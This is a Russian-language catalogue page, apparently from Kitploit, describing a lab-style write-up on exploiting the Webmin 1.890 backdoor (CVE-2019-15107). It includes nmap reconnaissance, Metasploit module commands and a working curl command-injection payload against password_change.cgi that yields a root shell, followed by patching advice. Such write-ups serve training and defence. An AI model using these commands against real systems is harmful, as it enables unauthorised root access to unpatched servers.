Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Project-Exploitation-of-Webmin-Authentication-Vulnerability — Цель исследования: провести всесторонний анализ и успешную эксплуатацию уязвимости удаленного выполнения кода (RCE) в Webmin версии 1.890 (CVE-2019-15107), в конечном итоге получив полный контроль над целевой системой. | Kitploit
Инструменты/GitHubGitHub/artemcyberlab/project-exploitation-of-webmin-authentication-vulnerability
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийПост-эксплуатацияТестирование на ПроникновениеОбучение и ОбразованиеЛаборатории и Практика
GitHubartemcyberlab/project-exploitation-of-webmin-authentication-vulnerability

Project-Exploitation-of-Webmin-Authentication-Vulnerability

Цель исследования: провести всесторонний анализ и успешную эксплуатацию уязвимости удаленного выполнения кода (RCE) в Webmin версии 1.890 (CVE-2019-15107), в конечном итоге получив полный контроль над целевой системой.

Репозиторий
31 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Цель исследования: Провести всесторонний анализ и успешную эксплуатацию уязвимости удаленного выполнения кода (RCE) в Webmin версии 1.890 (CVE-2019-15107), в конечном итоге получив полный контроль над целевой системой.

Методология:

Первоначальная разведка:

Сканирование сети выполнено с помощью Nmap:

root@kitploit:~
nmap -sV -sC -A -p- 10.201.105.185

Обнаружена служба Webmin 1.890, работающая на порту 10000

Анализ уязвимости:

Исследован механизм уязвимости в password_change.cgi

Подтверждена возможность неаутентифицированного произвольного выполнения команд

Эксплуатация:

Реализованы два вектора атаки:

С использованием Metasploit Framework:

root@kitploit:~
use exploit/linux/http/webmin_backdoor
set RHOSTS 10.201.105.185
set LHOST tun0
exploit

Ручная эксплуатация через curl:

root@kitploit:~
curl -k "https://10.201.105.185:10000/password_change.cgi" -d "user=root&pam=&expired=2&old=test|id&new1=test&new2=test"

Постэксплуатация:

Получена интерактивная оболочка root

Проведен анализ файловой системы

Обнаружены файлы флагов:

root@kitploit:~
/home/dark/user.txt
/root/root.txt

Результаты:

Успешно эксплуатирована уязвимость CVE-2019-15107

Получены полные привилегии root на системе

Продемонстрирована критическая важность своевременного обновления программного обеспечения

Технические выводы:

Уязвимость позволяет произвольное выполнение команд через внедрение параметра "old"

Отсутствие проверок аутентификации делает это особенно опасным

Версия 1.890 содержит бэкдор, исправленный в более поздних релизах

Рекомендации по безопасности:

Немедленное обновление до текущей версии Webmin

Ограничить доступ к панели управления по IP

Регулярные аудиты безопасности веб-приложений

Дальнейшие направления исследований:

Анализ других уязвимостей Webmin

Разработка собственного эксплойта без Metasploit

Исследование методов сохранения доступа в скомпрометированных системах

Это тематическое исследование демонстрирует критическую важность своевременного обновления систем и необходимость непрерывного мониторинга уязвимостей в развернутом программном обеспечении. Исследование предоставляет практические идеи о современных методах эксплуатации веб-приложений, подчеркивая основные принципы безопасности.

Скачать инструмент